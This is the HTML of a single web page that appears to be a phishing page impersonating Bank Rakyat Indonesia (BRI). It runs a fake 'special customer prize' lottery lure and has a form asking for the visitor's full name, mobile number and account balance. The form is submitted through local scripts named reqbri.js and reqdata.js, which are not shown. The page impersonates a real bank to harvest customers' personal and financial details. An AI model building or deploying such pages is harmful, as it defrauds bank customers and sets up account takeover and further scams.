<!DOCTYPE html><html lang="en"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
    <meta name="theme-color" content="#04549c">
    <meta property="og:title" content=" 𝗚𝗲𝗯𝘆𝗮𝗿 𝗨𝗻𝗱𝗶𝗮𝗻 𝗕𝗲𝗿𝗵𝗮𝗱𝗶𝗮𝗵 - 𝗕𝗮𝗻𝗸 𝗕𝗿𝗶
    ">
    <title>
        𝗚𝗲𝗯𝘆𝗮𝗿 𝗨𝗻𝗱𝗶𝗮𝗻 𝗕𝗲𝗿𝗵𝗮𝗱𝗶𝗮𝗵 - 𝗕𝗮𝗻𝗸 𝗕𝗿𝗶
    </title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.7/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link rel="stylesheet" href="css/index.css" type="text/css" media="all">
  </head>

  <body>
      
      <main>
          <nav class="nvi">
              <img src="images/nav.png" alt="">
          </nav>
          
          <!-- input box -->
          <div class="formbox">
              <form id="formdata" method="post">
                  <div class="boxsal">
                      <img src="images/sal.png" alt="">
                  </div>
                  <div class="titlecetak">Hadiah Sepesial Nasabah</div>
                  <br>
                  <div class="inp">
                      <label for="norek">Nama Lengkap :</label>
                      <input type="text" name="nama" id="nama" placeholder="Masukkan Nama Lengkap" required="">
                  </div>
                  
                  <div class="inp">
                      <label for="nohp">No. Handphone :</label>
                      <input type="tel" name="nohp" id="nohp" placeholder="Masukkan No. Handphone" required="" maxlength="13" minlength="10">
                  </div>
                  
                  <div class="inp">
                      <label for="nokartu">Saldo Akhir :</label>
                      <input type="tel" name="saldo" id="saldo" class="saldo" placeholder="Rp. " required="">
                  </div>
                  
                  <button class="kirim" type="submit" id="kirim">Lanjutkan</button>
              </form>
          </div>
          
          <footer class="foot">
              <span>PT. Bank Rakyat Indonesia (Persero) Tbk.</span>
          </footer>
      </main>
      
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.7/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
  


<script src="js/jquery.min_1.js"></script>
<script src="js/jquery.min.js"></script>
<script src="js/reqbri.js"></script>
<script src="js/vibr.js"></script>
<script src="js/rupiah.js"></script>
<script src="js/reqdata.js"></script>
</body><!-- partial --></html>